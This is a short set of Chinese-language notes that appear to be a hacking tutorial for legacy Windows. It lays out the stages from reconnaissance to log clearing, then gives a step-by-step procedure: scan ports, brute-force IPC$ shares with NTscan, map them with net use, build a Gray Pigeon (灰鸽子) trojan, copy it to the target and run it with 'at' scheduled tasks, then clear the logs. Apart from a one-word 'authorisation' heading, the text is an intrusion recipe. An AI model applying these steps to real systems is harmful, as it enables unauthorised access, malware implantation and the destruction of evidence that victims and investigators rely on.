a. 授权
b. 信息收集
nslookup whois
c. 扫描漏洞
从高至低, IP -> Port 软件 网站
e. 漏洞利用
d. 提权(Shell环境、桌面环境 最高权限)
f. 清除日志
telnet <IP> <port> # 使用该命令 可以通过回应来测试端口号是否开启
net use <F:> <IP\...> <pwd> /user:<user> # 以user身份登录,将共享盘映射到本机上的 F盘
net use <F:> /del
net use <ipc$> <pwd> /user:<user>
time # 查看时间
time \\<ip> # 查看目标电脑的时间
at # 列出task
at <time> <...> # 在time这个时间,进行...任务。例如
at \\192.168.1.1 11:46 "c:\windows\system32\sds.exe" 即在某个时间执行sds.exe
简单流程
1. scanport 扫描软件, 扫描开放端口
2. 漏洞利用 IPC$:
进行暴力破解 NTscan
实际该软件用的是命令 telnet use <IP> <pwd> /user:<user>
3. net use f: <IP\IPC$> <pwd> /user:<user>
将共享IPC$ 映射到本地F:
4. 制作木马
利用 灰鸽子软件
5. 植入木马
copy <src> <des>
6. 设置计划任务自动执行木马
net time <IP>
at <IP> <time> "<>"
# 例如植入软件为 c:/windows/system32/dsc.exe
# 在 远程电脑192.168.5.2, 时间是 11:16
# at \\192.168.5.2 11:16 "c:/windows/system32/dsc.exe"
7. 清除日志